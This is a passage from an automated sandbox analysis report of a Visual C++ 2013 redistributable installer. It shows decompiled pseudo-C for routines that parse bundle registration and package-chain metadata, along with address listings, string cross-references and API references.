													_push("Failed to select ARP node.");
													goto L91;
												}
												_push("Failed to get @PerMachine.");
												goto L91;
											}
											_push("Failed to get @ExecutableName.");
											goto L91;
										}
										_push("Failed to get @ProviderKey.");
										goto L91;
									}
									_push(_v16);
									_push("Failed to parse @Version: %ls");
									goto L63;
								}
								_push("Failed to get @Version.");
								goto L91;
							}
							_push("Failed to parse related bundles");
							goto L91;
						}
						_push("Failed to get @Tag.");
						goto L91;
					}
					_push("Failed to get @Id.");
					goto L91;
				} else {
					_push("Failed to select registration node.");
					L91:
					_push(_t179);
					E012AFA86();
					L92:
					_t110 = _v12;
					if(_t110 != 0) {
						 *((intOrPtr*)( *_t110 + 8))(_t110);
					}
					_t111 = _v8;
					if(_t111 != 0) {
						 *((intOrPtr*)( *_t111 + 8))(_t111);
					}
					_t112 = _v20;
					if(_t112 != 0) {
						 *((intOrPtr*)( *_t112 + 8))(_t112);
					}
					if(_v16 != 0) {
						E012B01E8(_v16);
					}
					return _t179;
				}
			}

0x01286217
0x0128622e
0x01286231
0x01286234
0x01286237
0x0128623f
0x01286249
0x0128624b
0x0128624b
0x0128624f
0x0128625b
0x01286273
0x01286294
0x012862ac
0x012862cd
0x012862eb
0x0128630f
0x01286330
0x0128634e
0x0128636b
0x01286370
0x01286620
0x0128663a
0x01286657
0x0128665c
0x0128672a
0x0128672c
0x01286731
0x01286735
0x00000000
0x00000000
0x01286737
0x00000000
0x01286737
0x01286664
0x0128667f
0x0128668e
0x01286692
0x012866b2
0x012866b6
0x012866d7
0x012866db
0x012866fc
0x01286700
0x0128671d
0x01286721
0x00000000
0x00000000
0x01286723
0x00000000
0x01286723
0x01286702
0x012866e1
0x012866e1
0x012866e1
0x012866bc
0x012866bc
0x012866bc
0x00000000
0x012866b6
0x01286694
0x00000000
0x01286694
0x01286666
0x00000000
0x01286666
0x0128663c
0x00000000
0x0128663c
0x01286378
0x01286395
0x01286399
0x012863b6
0x012863ba
0x012863db
0x012863df
0x01286400
0x01286404
0x01286425
0x01286429
0x0128644a
0x0128644e
0x0128646f
0x01286473
0x01286494
0x01286498
0x012864b9
0x012864bd
0x012864e1
0x012864e5
0x01286509
0x0128650d
0x0128652e
0x01286532
0x012865d6
0x012865d8
0x012865da
0x012865da
0x012865e0
0x012865e2
0x01286602
0x01286606
0x00000000
0x00000000
0x0128660a
0x01286616
0x00000000
0x01286616
0x0128660c
0x00000000
0x0128660c
0x012865e4
0x00000000
0x012865e4
0x01286548
0x01286551
0x01286577
0x0128659e
0x012865a9
0x012865b9
0x012865be
0x012865c1
0x012865c6
0x012865c6
0x012865c7
0x00000000
0x012865cc
0x012865a0
0x00000000
0x012865a0
0x01286579
0x00000000
0x01286579
0x01286553
0x00000000
0x01286513
0x01286513
0x00000000
0x01286513
0x012864eb
0x012864eb
0x00000000
0x012864eb
0x012864c3
0x012864c3
0x00000000
0x012864c3
0x0128649e
0x0128649e
0x00000000
0x0128649e
0x01286479
0x01286479
0x00000000
0x01286479
0x01286454
0x01286454
0x00000000
0x01286454
0x0128642f
0x0128642f
0x00000000
0x0128642f
0x0128640a
0x0128640a
0x00000000
0x0128640a
0x012863e5
0x012863e5
0x00000000
0x012863e5
0x012863c0
0x012863c0
0x00000000
0x012863c0
0x012863ba
0x0128639b
0x00000000
0x0128639b
0x0128637a
0x00000000
0x0128637a
0x01286350
0x00000000
0x01286350
0x01286332
0x00000000
0x01286332
0x01286311
0x00000000
0x01286311
0x012862ed
0x012862f0
0x00000000
0x012862f0
0x012862cf
0x00000000
0x012862cf
0x012862ae
0x00000000
0x012862ae
0x01286296
0x00000000
0x01286296
0x01286275
0x00000000
0x01286251
0x01286251
0x0128673c
0x0128673c
0x0128673d
0x01286744
0x01286744
0x01286749
0x0128674e
0x0128674e
0x01286751
0x01286756
0x0128675b
0x0128675b
0x0128675e
0x01286763
0x01286768
0x01286768
0x0128676f
0x01286774
0x01286774
0x0128677f
0x0128677f

Strings

Publisher, xrefs: 012863F3
HelpLink, xrefs: 01286418
Tag, xrefs: 01286283
Failed to get @Publisher., xrefs: 0128640A
Failed to get @AboutUrl., xrefs: 01286479
Failed to get @HelpLink., xrefs: 0128642F
Failed to get @PerMachine., xrefs: 01286350
Failed to get @Contact., xrefs: 01286513
Failed to select ARP node., xrefs: 0128637A
UpdateUrl, xrefs: 01286487
Version, xrefs: 012862BC
Failed to get @ProductFamily., xrefs: 012866E1
Failed to get @UpdateUrl., xrefs: 0128649E
ExecutableName, xrefs: 0128631F
Failed to get @Comments., xrefs: 012864EB
Failed to get @ExecutableName., xrefs: 01286332
registration.cpp, xrefs: 012865B4
Failed to get @DisableModify., xrefs: 012865E4
Failed to get @Register., xrefs: 0128639B
DisableRemove, xrefs: 012865F5
Registration, xrefs: 01286226
button, xrefs: 0128653A
Failed to select Update node., xrefs: 01286666
Failed to get @Department., xrefs: 012866BC
Update, xrefs: 0128664A
Failed to get @DisplayVersion., xrefs: 012863E5
Manufacturer, xrefs: 01286677
Failed to get @Manufacturer., xrefs: 01286694
Department, xrefs: 012866A5
Failed to parse software tag., xrefs: 0128663C
ProviderKey, xrefs: 012862FE
ParentDisplayName, xrefs: 012864AC
Contact, xrefs: 012864FC
Failed to get @Version., xrefs: 012862CF
HelpTelephone, xrefs: 0128643D
AboutUrl, xrefs: 01286462
Failed to get @Classification., xrefs: 01286723
Failed to get @HelpTelephone., xrefs: 01286454
PerMachine, xrefs: 0128633D
Failed to select registration node., xrefs: 01286251
DisableModify, xrefs: 01286521
Name, xrefs: 012866EF
DisplayVersion, xrefs: 012863CE
Failed to parse related bundles, xrefs: 012862AE
Failed to get @ProviderKey., xrefs: 01286311
Failed to set registration paths., xrefs: 01286737
Classification, xrefs: 01286710
Register, xrefs: 01286388
yes, xrefs: 01286560
DisplayName, xrefs: 012863A9
Failed to get @DisableRemove., xrefs: 0128660C
Failed to get @Tag., xrefs: 01286296
ProductFamily, xrefs: 012866CA
Invalid modify disabled type: %ls, xrefs: 012865C1
Comments, xrefs: 012864D4
Failed to get @Name., xrefs: 01286702
Failed to get @ParentDisplayName., xrefs: 012864C3
Failed to parse @Version: %ls, xrefs: 012862F0
Failed to get @Id., xrefs: 01286275
Arp, xrefs: 0128635E
Failed to get @DisplayName., xrefs: 012863C0

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$registration.cpp$yes
API String ID: 760788290-2956246334
Opcode ID: 5dca78ad6cf0ea5340c420d0b72f29aec7ea4bea0a5140a8b902de75b98cfa24
Instruction ID: d2fd1766997b084fb37d4030df0766509d4ad891f8bede2116f36c00f1d66615
Opcode Fuzzy Hash: 5dca78ad6cf0ea5340c420d0b72f29aec7ea4bea0a5140a8b902de75b98cfa24
Instruction Fuzzy Hash: A9D1FB326B160ABADB12FEA4CDC1FFE7677DF80794F680029E61567291EBB1E5014740

Uniqueness

Uniqueness Score: -1.00%

Function 0128449E Relevance: 102.1, APIs: 8, Strings: 50, Instructions: 592
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E0128449E(void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
				void* _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				short* _v28;
				signed int _v32;
				short* _v36;
				void* __ebx;
				void* __edi;
				intOrPtr* _t202;
				intOrPtr* _t205;
				intOrPtr* _t208;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr _t218;
				signed int _t219;
				void* _t247;
				int _t253;
				intOrPtr* _t258;
				intOrPtr _t262;
				short** _t274;
				signed int _t277;
				intOrPtr _t296;
				signed int _t297;
				intOrPtr* _t307;
				void* _t315;
				short** _t318;
				void* _t340;
				void* _t347;
				intOrPtr* _t351;

				_v16 = 0;
				_v8 = 0;
				_v20 = 0;
				_v12 = 0;
				_v32 = 0;
				_v24 = 0;
				_t340 = E012B4F9E(_a12, L"RollbackBoundary",  &_v16);
				if(_t340 >= 0) {
					_t202 = _v16;
					_t340 =  *((intOrPtr*)( *_t202 + 0x20))(_t202,  &_v20);
					if(_t340 >= 0) {
						_t204 = _v20;
						_t351 = _a4;
						if(_v20 == 0) {
							L17:
							_t205 = _v16;
							if(_t205 != 0) {
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_v16 = 0;
							}
							if(E012B4F9E(_a12, L"Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage",  &_v16) >= 0) {
								_t208 = _v16;
								_t320 =  *_t208;
								_t338 =  &_v20;
								_push( &_v20);
								_push(_t208);
								if( *((intOrPtr*)( *_t208 + 0x20))() >= 0) {
									_t210 = _v20;
									if(_v20 == 0) {
										L110:
										_t340 = 0;
										goto L111;
									}
									_t218 = E012B233B(_t210 * 0xe0, 1);
									 *((intOrPtr*)(_t351 + 8)) = _t218;
									if(_t218 != 0) {
										_t219 = _v20;
										 *((intOrPtr*)(_t351 + 0xc)) = _t219;
										_v28 = 0;
										if(_t219 <= 0) {
											L107:
											_t340 = E012842FE(_t351, _a12);
											if(_t340 >= 0) {
												goto L110;
											}
											_push("Failed to parse target product codes.");
											goto L109;
										}
										_a4 = 0;
										while(1) {
											_t315 =  *((intOrPtr*)(_t351 + 8)) + _a4;
											_t340 = E012B5026(_t320, _v16,  &_v8,  &_v12);
											if(_t340 < 0) {
												break;
											}
											_t340 = E012B540B(_v8, L"Id", _t315);
											if(_t340 < 0) {
												L71:
												_push("Failed to get @Id.");
												goto L109;
											}
											_t340 = E012B54DD(_t320, _v8, L"Cache", _t315 + 0x20);
											if(_t340 < 0) {
												_push("Failed to get @Cache.");
												goto L109;
											}
											_t340 = E012B540B(_v8, L"CacheId", _t315 + 0x24);
											if(_t340 < 0) {
												_push("Failed to get @CacheId.");
												goto L109;
											}
											_t340 = E012B5586(_v8, L"Size", _t315 + 0x30);
											if(_t340 < 0) {
												_push("Failed to get @Size.");
												goto L109;
											}
											_t340 = E012B5586(_v8, L"InstallSize", _t315 + 0x28);
											if(_t340 < 0) {
												_push("Failed to get @InstallSize.");
												goto L109;
											}
											_t340 = E012B54DD(_t320, _v8, L"PerMachine", _t315 + 0x14);
											if(_t340 < 0) {
												_push("Failed to get @PerMachine.");
												goto L109;
											}
											_t340 = E012B54DD(_t320, _v8, L"Permanent", _t315 + 0x18);
											if(_t340 < 0) {
												_push("Failed to get @Permanent.");
												goto L109;
											}
											 *(_t315 + 0x18) = 0 |  *(_t315 + 0x18) == 0x00000000;
											_t340 = E012B54DD(_t320, _v8, L"Vital", _t315 + 0x1c);
											if(_t340 < 0) {
												L78:
												_push("Failed to get @Vital.");
												goto L109;
											}
											_t340 = E012B540B(_v8, L"LogPathVariable", _t315 + 4);
											if(_t340 == 0x80070490 || _t340 >= 0) {
												_t340 = E012B540B(_v8, L"RollbackLogPathVariable", _t315 + 8);
												if(_t340 == 0x80070490 || _t340 >= 0) {
													_t247 = E012B540B(_v8, L"InstallCondition", _t315 + 0xc); // executed
													_t340 = _t247;
													if(_t340 == 0x80070490 || _t340 >= 0) {
														_t340 = E012B540B(_v8, L"RollbackBoundaryForward",  &_v24);
														if(_t340 == 0x80070490) {
															L46:
															_t340 = E012B540B(_v8, L"RollbackBoundaryBackward",  &_v24);
															if(_t340 == 0x80070490) {
																L49:
																if(CompareStringW(0x7f, 0, _v12, 0xffffffff, L"ExePackage", 0xffffffff) != 2) {
																	_t253 = CompareStringW(0x7f, 0, _v12, 0xffffffff, L"MsiPackage", 0xffffffff);
																	if(_t253 != 2) {
																		if(CompareStringW(0x7f, 0, _v12, 0xffffffff, L"MspPackage", 0xffffffff) != 2) {
																			if(CompareStringW(0x7f, 0, _v12, 0xffffffff, L"MsuPackage", 0xffffffff) != 2) {
																				L60:
																				_t340 = E012841AD(_t315, _a8, _v8);
																				if(_t340 < 0) {
																					_push("Failed to parse payload references.");
																					goto L109;
																				}
																				_t340 = E0129F1FD(_t315, _v8);
																				if(_t340 < 0) {
																					_push("Failed to parse dependency providers.");
																					goto L109;
																				}
																				_t258 = _v8;
																				if(_t258 != 0) {
																					_t320 =  *_t258;
																					 *((intOrPtr*)( *_t258 + 8))(_t258);
																					_v8 = 0;
																				}
																				if(_v12 != 0) {
																					__imp__#6(_v12);
																					_v12 = 0;
																				}
																				_v28 = _v28 + 1;
																				_a4 = _a4 + 0xe0;
																				if(_v28 < _v20) {
																					continue;
																				} else {
																					_t345 = _v32;
																					if(_v32 == 0) {
																						goto L107;
																					}
																					_t262 = E012B233B(_t345 << 4, 1);
																					 *((intOrPtr*)(_t351 + 0x20)) = _t262;
																					if(_t262 != 0) {
																						 *((intOrPtr*)(_t351 + 0x24)) = E012B233B(_t345 << 2, 1);
																						if( *((intOrPtr*)(_t351 + 0x20)) != 0) {
																							_v36 = 0;
																							if( *((intOrPtr*)(_t351 + 0xc)) <= 0) {
																								goto L107;
																							}
																							_v28 = 0;
																							do {
																								_t318 =  *((intOrPtr*)(_t351 + 8)) + _v28;
																								if(_t318[0x23] != 3) {
																									goto L106;
																								}
																								_v32 = _v32 & 0x00000000;
																								 *( *((intOrPtr*)(_t351 + 0x20)) + ( *(_t351 + 0x28) +  *(_t351 + 0x28)) * 8) = _t318[0x25];
																								 *((intOrPtr*)( *((intOrPtr*)(_t351 + 0x20)) + 4 + ( *(_t351 + 0x28) +  *(_t351 + 0x28)) * 8)) = 2;
																								 *( *((intOrPtr*)(_t351 + 0x24)) +  *(_t351 + 0x28) * 4) = _t318;
																								 *(_t351 + 0x28) =  *(_t351 + 0x28) + 1;
																								if( *((intOrPtr*)(_t351 + 0xc)) <= 0) {
																									goto L106;
																								}
																								_a8 = _a8 & 0x00000000;
																								do {
																									_t347 =  *((intOrPtr*)(_t351 + 8)) + _a8;
																									if( *((intOrPtr*)(_t347 + 0x8c)) != 2) {
																										goto L105;
																									}
																									_a4 = _a4 & 0x00000000;
																									if( *((intOrPtr*)(_t347 + 0xd4)) <= 0) {
																										goto L105;
																									} else {
																										goto L100;
																									}
																									do {
																										L100:
																										_t274 =  *((intOrPtr*)(_t347 + 0xd0)) + _a4 * 4;
																										if( *_t274 != 0 && CompareStringW(0x7f, 0,  *_t318, 0xffffffff,  *_t274, 0xffffffff) == 2) {
																											_t277 = _a4;
																											 *( *((intOrPtr*)(_t347 + 0xcc)) + _t277 * 4) = _t318;
																											_t278 =  *((intOrPtr*)(_t347 + 0xd0)) + _t277 * 4;
																											if( *( *((intOrPtr*)(_t347 + 0xd0)) + _t277 * 4) != 0) {
																												E012B01E8( *_t278);
																												_t280 =  *((intOrPtr*)(_t347 + 0xd0));
																												 *(_t280 + _a4 * 4) =  *( *((intOrPtr*)(_t347 + 0xd0)) + _a4 * 4) & 0x00000000;
																											}
																										}
																										_a4 = _a4 + 1;
																									} while (_a4 <  *((intOrPtr*)(_t347 + 0xd4)));
																									L105:
																									_v32 = _v32 + 1;
																									_a8 = _a8 + 0xe0;
																								} while (_v32 <  *((intOrPtr*)(_t351 + 0xc)));
																								L106:
																								_v36 = _v36 + 1;
																								_v28 = _v28 + 0xe0;
																							} while (_v36 <  *((intOrPtr*)(_t351 + 0xc)));
																							goto L107;
																						}
																						_t340 = 0x8007000e;
																						E012B294E(_t265, "package.cpp", 0xf4, 0x8007000e);
																						_push("Failed to allocate memory for patch sequence information to package lookup.");
																						goto L109;
																					}
																					_t340 = 0x8007000e;
																					E012B294E(_t262, "package.cpp", 0xf1, 0x8007000e);
																					_push("Failed to allocate memory for MSP patch sequence information.");
																					goto L109;
																				}
																			}
																			 *(_t315 + 0x8c) = 4;
																			_t340 = E0129E459(_v8, _t315);
																			if(_t340 < 0) {
																				_push("Failed to parse MSU package.");
																				goto L109;
																			}
																			goto L60;
																		}
																		 *(_t315 + 0x8c) = 3;
																		_t340 = E0129D2D2(_v8, _t315);
																		if(_t340 < 0) {
																			_push("Failed to parse MSP package.");
																			goto L109;
																		}
																		_v32 = _v32 + 1;
																		goto L60;
																	}
																	 *(_t315 + 0x8c) = _t253;
																	_t340 = E0129C6FA(_t338, _v8, _t315);
																	if(_t340 >= 0) {
																		goto L60;
																	}
																	_push("Failed to parse MSI package.");
																	goto L109;
																}
																 *(_t315 + 0x8c) = 1;
																_t340 = E01299E4E(_v8, _t315);
																if(_t340 >= 0) {
																	goto L60;
																}
																_push("Failed to parse EXE package.");
																goto L109;
															}
															if(_t340 < 0) {
																_push("Failed to get @RollbackBoundaryBackward.");
																goto L109;
															}
															_t340 = E0128445B(_t351, _v24, _t315 + 0x3c);
															if(_t340 < 0) {
																_push(_v24);
																_push("Failed to find backward transaction boundary: %ls");
																L86:
																_push(_t340);
																E012AFA86();
																goto L111;
															}
															goto L49;
														}
														if(_t340 < 0) {
															_push("Failed to get @RollbackBoundaryForward.");
															goto L109;
														}
														_t340 = E0128445B(_t351, _v24, _t315 + 0x38);
														if(_t340 < 0) {
															_push(_v24);
															_push("Failed to find forward transaction boundary: %ls");
															goto L86;
														}
														goto L46;
													} else {
														_push("Failed to get @InstallCondition.");
														goto L109;
													}
												} else {
													_push("Failed to get @RollbackLogPathVariable.");
													goto L109;
												}
											} else {
												_push("Failed to get @LogPathVariable.");
												goto L109;
											}
										}
										L70:
										_push("Failed to get next node.");
										goto L109;
									}
									_t340 = 0x8007000e;
									E012B294E(_t218, "package.cpp", 0x67, 0x8007000e);
									_push("Failed to allocate memory for package structs.");
									goto L109;
								}
								_push("Failed to get package node count.");
								goto L109;
							} else {
								_push("Failed to select package nodes.");
								L109:
								_push(_t340);
								E012AFA86();
								L111:
								L112:
								_t211 = _v16;
								if(_t211 != 0) {
									 *((intOrPtr*)( *_t211 + 8))(_t211);
								}
								_t212 = _v8;
								if(_t212 != 0) {
									 *((intOrPtr*)( *_t212 + 8))(_t212);
								}
								if(_v12 != 0) {
									__imp__#6(_v12);
								}
								if(_v24 != 0) {
									E012B01E8(_v24);
								}
								return _t340;
							}
						}
						_t296 = E012B233B(_t204 << 3, 1);
						 *_t351 = _t296;
						if(_t296 != 0) {
							_t297 = _v20;
							 *((intOrPtr*)(_t351 + 4)) = _t297;
							_a4 = 0;
							if(_t297 <= 0) {
								goto L17;
							} else {
								goto L9;
							}
							while(1) {
								L9:
								_t333 = _a4;
								_v36 =  *_t351 + _a4 * 8;
								_t340 = E012B5026(_a4, _v16,  &_v8,  &_v12);
								if(_t340 < 0) {
									goto L70;
								}
								_t340 = E012B540B(_v8, L"Id", _v36);
								if(_t340 < 0) {
									goto L71;
								}
								_t340 = E012B54DD(_t333, _v8, L"Vital", _v36 + 4);
								if(_t340 < 0) {
									goto L78;
								}
								_t307 = _v8;
								if(_t307 != 0) {
									 *((intOrPtr*)( *_t307 + 8))(_t307);
									_v8 = 0;
								}
								if(_v12 != 0) {
									__imp__#6(_v12);
									_v12 = 0;
								}
								_a4 = _a4 + 1;
								if(_a4 < _v20) {
									continue;
								} else {
									goto L17;
								}
							}
							goto L70;
						}
						_t340 = 0x8007000e;
						E012B294E(_t296, "package.cpp", 0x3c, 0x8007000e);
						_push("Failed to allocate memory for rollback boundary structs.");
						goto L109;
					}
					_push("Failed to get rollback bundary node count.");
					L4:
					_push(_t340);
					E012AFA86();
					goto L112;
				}
				_push("Failed to select rollback boundary nodes.");
				goto L4;
			}

0x012844b4
0x012844b7
0x012844ba
0x012844bd
0x012844c0
0x012844c3
0x012844cb
0x012844cf
0x012844d8
0x012844e5
0x012844e9
0x012844fd
0x01284501
0x01284506
0x012845d7
0x012845d7
0x012845dc
0x012845e1
0x012845e4
0x012845e4
0x012845fc
0x01284608
0x0128460b
0x0128460d
0x01284610
0x01284611
0x01284619
0x01284625
0x0128462a
0x01284c14
0x01284c14
0x00000000
0x01284c14
0x01284639
0x0128463e
0x01284643
0x01284661
0x01284664
0x01284667
0x0128466c
0x01284bf5
0x01284bff
0x01284c03
0x00000000
0x00000000
0x01284c05
0x00000000
0x01284c05
0x01284672
0x01284675
0x01284678
0x0128468b
0x0128468f
0x00000000
0x00000000
0x012846a3
0x012846a7
0x012849ea
0x012849ea
0x00000000
0x012849ea
0x012846be
0x012846c2
0x012849f4
0x00000000
0x012849f4
0x012846d9
0x012846dd
0x012849fe
0x00000000
0x012849fe
0x012846f4
0x012846f8
0x01284a08
0x00000000
0x01284a08
0x0128470f
0x01284713
0x01284a12
0x00000000
0x01284a12
0x0128472a
0x0128472e
0x01284a1c
0x00000000
0x01284a1c
0x01284745
0x01284749
0x01284a26
0x00000000
0x01284a26
0x01284757
0x0128476b
0x0128476f
0x01284a30
0x01284a30
0x00000000
0x01284a30
0x01284786
0x0128478e
0x012847a9
0x012847b1
0x012847c7
0x012847cc
0x012847d4
0x012847ef
0x012847f7
0x01284819
0x0128482a
0x01284832
0x01284854
0x0128486f
0x012848a8
0x012848ad
0x012848e3
0x0128491c
0x0128493b
0x01284948
0x0128494c
0x01284aa0
0x00000000
0x01284aa0
0x0128495b
0x0128495f
0x01284aaa
0x00000000
0x01284aaa
0x01284965
0x0128496c
0x0128496e
0x01284971
0x01284974
0x01284974
0x0128497a
0x0128497f
0x01284985
0x01284985
0x01284988
0x0128498e
0x01284998
0x00000000
0x0128499e
0x0128499e
0x012849a3
0x00000000
0x00000000
0x012849b1
0x012849b6
0x012849bb
0x01284ac1
0x01284ac7
0x01284ae8
0x01284aee
0x00000000
0x00000000
0x01284af4
0x01284af7
0x01284afa
0x01284b04
0x00000000
0x00000000
0x01284b16
0x01284b1c
0x01284b27
0x01284b35
0x01284b38
0x01284b3f
0x00000000
0x00000000
0x01284b45
0x01284b49
0x01284b4c
0x01284b56
0x00000000
0x00000000
0x01284b58
0x01284b63
0x00000000
0x00000000
0x00000000
0x00000000
0x01284b65
0x01284b65
0x01284b6e
0x01284b74
0x01284b93
0x01284b96
0x01284b9f
0x01284ba5
0x01284ba9
0x01284bae
0x01284bb7
0x01284bb7
0x01284ba5
0x01284bbb
0x01284bc1
0x01284bc9
0x01284bc9
0x01284bcf
0x01284bd6
0x01284bdf
0x01284bdf
0x01284be5
0x01284bec
0x00000000
0x01284af7
0x01284ac9
0x01284ad9
0x01284ade
0x00000000
0x01284ade
0x012849c1
0x012849d1
0x012849d6
0x00000000
0x012849d6
0x01284998
0x0128491f
0x01284931
0x01284935
0x01284a96
0x00000000
0x01284a96
0x00000000
0x01284935
0x012848e6
0x012848f8
0x012848fc
0x01284a8c
0x00000000
0x01284a8c
0x01284902
0x00000000
0x01284902
0x012848b0
0x012848be
0x012848c2
0x00000000
0x00000000
0x012848c4
0x00000000
0x012848c4
0x01284872
0x01284884
0x01284888
0x00000000
0x00000000
0x0128488e
0x00000000
0x0128488e
0x01284836
0x01284a6c
0x00000000
0x01284a6c
0x0128484a
0x0128484e
0x01284a76
0x01284a79
0x01284a7e
0x01284a7e
0x01284a7f
0x00000000
0x01284a84
0x00000000
0x0128484e
0x012847fb
0x01284a58
0x00000000
0x01284a58
0x0128480f
0x01284813
0x01284a62
0x01284a65
0x00000000
0x01284a65
0x00000000
0x01284a4e
0x01284a4e
0x00000000
0x01284a4e
0x01284a44
0x01284a44
0x00000000
0x01284a44
0x01284a3a
0x01284a3a
0x00000000
0x01284a3a
0x0128478e
0x012849e0
0x012849e0
0x00000000
0x012849e0
0x01284645
0x01284652
0x01284657
0x00000000
0x01284657
0x0128461b
0x00000000
0x012845fe
0x012845fe
0x01284c0a
0x01284c0a
0x01284c0b
0x01284c16
0x01284c17
0x01284c17
0x01284c1c
0x01284c21
0x01284c21
0x01284c24
0x01284c29
0x01284c2e
0x01284c2e
0x01284c35
0x01284c3a
0x01284c3a
0x01284c44
0x01284c49
0x01284c49
0x01284c53
0x01284c53
0x012845fc
0x01284512
0x01284517
0x0128451b
0x01284539
0x0128453c
0x0128453f
0x01284544
0x00000000
0x00000000
0x00000000
0x00000000
0x0128454a
0x0128454a
0x0128454c
0x01284552
0x01284565
0x01284569
0x00000000
0x00000000
0x0128457f
0x01284583
0x00000000
0x00000000
0x0128459d
0x012845a1
0x00000000
0x00000000
0x012845a7
0x012845ac
0x012845b1
0x012845b4
0x012845b4
0x012845ba
0x012845bf
0x012845c5
0x012845c5
0x012845c8
0x012845d1
0x00000000
0x00000000
0x00000000
0x00000000
0x012845d1
0x00000000
0x0128454a
0x0128451d
0x0128452a
0x0128452f
0x00000000
0x0128452f
0x012844eb
0x012844f0
0x012844f0
0x012844f1
0x00000000
0x012844f7
0x012844d1
0x00000000

APIs

SysFreeString.OLEAUT32(?), ref: 012845BF
SysFreeString.OLEAUT32(00000000), ref: 01284C3A

Part of subcall function 012B233B: GetProcessHeap.KERNEL32(?,00000000,?,01283087,?,00000000,?,?,?,00000000), ref: 012B234C
Part of subcall function 012B233B: RtlAllocateHeap.NTDLL(00000000,?,01283087,?,00000000,?,?,?,00000000), ref: 012B2353

Strings

RollbackBoundary, xrefs: 012844AC
Failed to get @RollbackLogPathVariable., xrefs: 01284A44
Failed to allocate memory for MSP patch sequence information., xrefs: 012849D6
Failed to get @LogPathVariable., xrefs: 01284A3A
Failed to parse EXE package., xrefs: 0128488E
Failed to get @PerMachine., xrefs: 01284A1C
Failed to get @Cache., xrefs: 012849F4
ExePackage, xrefs: 0128485C
Failed to get next node., xrefs: 012849E0
Failed to get @InstallCondition., xrefs: 01284A4E
RollbackBoundaryBackward, xrefs: 0128481D
Failed to parse dependency providers., xrefs: 01284AAA
package.cpp, xrefs: 01284525, 0128464D, 012849CC, 01284AD4
CacheId, xrefs: 012846CC
Failed to find forward transaction boundary: %ls, xrefs: 01284A65
Failed to parse payload references., xrefs: 01284AA0
Failed to allocate memory for patch sequence information to package lookup., xrefs: 01284ADE
Failed to get @Size., xrefs: 01284A08
Failed to find backward transaction boundary: %ls, xrefs: 01284A79
InstallCondition, xrefs: 012847BF
Failed to parse MSU package., xrefs: 01284A96
MsuPackage, xrefs: 01284909
Failed to get @InstallSize., xrefs: 01284A12
LogPathVariable, xrefs: 01284779
MsiPackage, xrefs: 0128489A
InstallSize, xrefs: 01284702
PerMachine, xrefs: 0128471D
RollbackBoundaryForward, xrefs: 012847E2
Failed to get @CacheId., xrefs: 012849FE
Failed to parse MSP package., xrefs: 01284A8C
Failed to get @Permanent., xrefs: 01284A26
Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage, xrefs: 012845EB
MspPackage, xrefs: 012848D0
Failed to parse MSI package., xrefs: 012848C4
Failed to select package nodes., xrefs: 012845FE
Permanent, xrefs: 01284738
Failed to allocate memory for rollback boundary structs., xrefs: 0128452F
Vital, xrefs: 01284590, 0128475E
Failed to parse target product codes., xrefs: 01284C05
Failed to allocate memory for package structs., xrefs: 01284657
Failed to select rollback boundary nodes., xrefs: 012844D1
RollbackLogPathVariable, xrefs: 0128479C
Failed to get @RollbackBoundaryForward., xrefs: 01284A58
Cache, xrefs: 012846B1
Failed to get package node count., xrefs: 0128461B
Size, xrefs: 012846E7
Failed to get rollback bundary node count., xrefs: 012844EB
Failed to get @Id., xrefs: 012849EA
Failed to get @Vital., xrefs: 01284A30
Failed to get @RollbackBoundaryBackward., xrefs: 01284A6C

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: FreeHeapString$AllocateProcess
